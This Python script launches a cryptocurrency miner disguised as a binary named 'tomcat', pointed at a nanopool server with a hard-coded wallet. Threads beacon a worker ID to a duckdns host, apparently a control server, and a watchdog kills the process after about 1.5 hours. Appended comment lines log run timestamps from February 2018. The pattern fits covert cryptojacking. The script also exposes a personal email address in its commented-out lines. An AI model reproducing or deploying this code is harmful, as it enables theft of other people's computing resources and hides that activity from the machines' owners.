import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:38:07.412151
#2018-02-17 17:26:06.971527
#2018-02-17 19:15:01.571341
#2018-02-17 21:03:03.590508
#2018-02-17 22:47:07.101031
#2018-02-18 00:32:06.038099
#2018-02-18 02:22:07.390636
#2018-02-18 04:09:05.837248
#2018-02-18 05:58:03.505105
#2018-02-18 07:50:09.351337
#2018-02-18 09:39:07.323871
#2018-02-18 11:25:03.089402
#2018-02-18 13:11:06.167771
#2018-02-18 14:59:07.118375
#2018-02-18 16:48:01.818758
#2018-02-18 18:36:01.595409
#2018-02-18 20:23:05.818304
#2018-02-18 22:09:05.466667
#2018-02-18 23:57:05.689652
#2018-02-19 01:43:03.391833
#2018-02-19 03:31:04.260655
#2018-02-19 05:15:08.956122
#2018-02-19 07:04:02.126289
#2018-02-19 08:52:04.335095
#2018-02-19 10:41:02.048177
#2018-02-19 12:27:06.996515
#2018-02-19 14:16:04.311889
#2018-02-19 16:04:09.826812
#2018-02-19 17:54:01.323526
#2018-02-19 19:42:01.701232
#2018-02-19 21:29:04.244920
#2018-02-19 23:14:07.654784
#2018-02-20 01:01:05.988367
#2018-02-20 02:50:07.161832
#2018-02-20 04:39:02.084669
#2018-02-20 06:23:05.352433
#2018-02-20 08:08:06.307255
#2018-02-20 09:53:04.375489
#2018-02-20 11:37:04.541438
#2018-02-20 13:24:07.972247
#2018-02-20 15:09:04.399326
#2018-02-20 16:55:07.487150
#2018-02-20 18:44:09.040679
#2018-02-20 20:36:04.034305
#2018-02-20 22:20:08.940846
#2018-02-21 00:01:07.267692
#2018-02-21 01:47:07.168194
#2018-02-21 03:36:07.450400
#2018-02-21 05:25:05.322885
#2018-02-21 07:12:03.272639
#2018-02-21 08:57:04.233537
#2018-02-21 10:44:04.207538
#2018-02-21 12:30:11.249736
#2018-02-21 14:17:06.318546
#2018-02-21 16:04:02.212636
#2018-02-21 17:55:08.527223
#2018-02-21 19:40:03.758133
#2018-02-21 21:27:04.566405
#2018-02-21 23:14:05.386322
#2018-02-22 01:04:02.252660
#2018-02-22 02:51:03.343435
#2018-02-22 04:38:04.150387
#2018-02-22 06:22:01.647646
#2018-02-22 08:09:05.918352
#2018-02-22 09:57:06.047963
#2018-02-22 11:42:04.757230
#2018-02-22 13:28:05.939489
#2018-02-22 15:16:07.998912
#2018-02-22 16:59:05.354352
#2018-02-22 18:46:11.104950
#2018-02-22 20:37:07.974346
#2018-02-22 22:23:08.177926
#2018-02-23 00:10:01.278445
#2018-02-23 01:58:04.828853
#2018-02-23 03:36:01.687751
#2018-02-23 05:20:11.282943
#2018-02-23 07:07:02.234948
#2018-02-23 08:54:08.221564
#2018-02-23 11:12:09.456162
#2018-02-23 13:05:09.490296
#2018-02-23 14:50:03.915455
#2018-02-23 16:39:02.138224
#2018-02-23 18:24:08.946305
#2018-02-23 20:08:07.118507
#2018-02-23 21:57:01.969073
#2018-02-23 23:45:08.923568
#2018-02-24 01:38:01.660366
#2018-02-24 03:27:05.734274
#2018-02-24 05:12:05.758428
#2018-02-24 07:00:11.265534
#2018-02-24 08:51:04.848553
#2018-02-24 10:52:05.964420
#2018-02-24 12:39:07.072001
#2018-02-24 14:28:01.309556
#2018-02-24 16:16:06.665300
#2018-02-24 18:09:04.742888
#2018-02-24 19:56:06.009488
#2018-02-24 21:40:04.440083
#2018-02-25 00:31:01.367915
#2018-02-25 03:32:03.789886
#2018-02-25 07:20:01.276619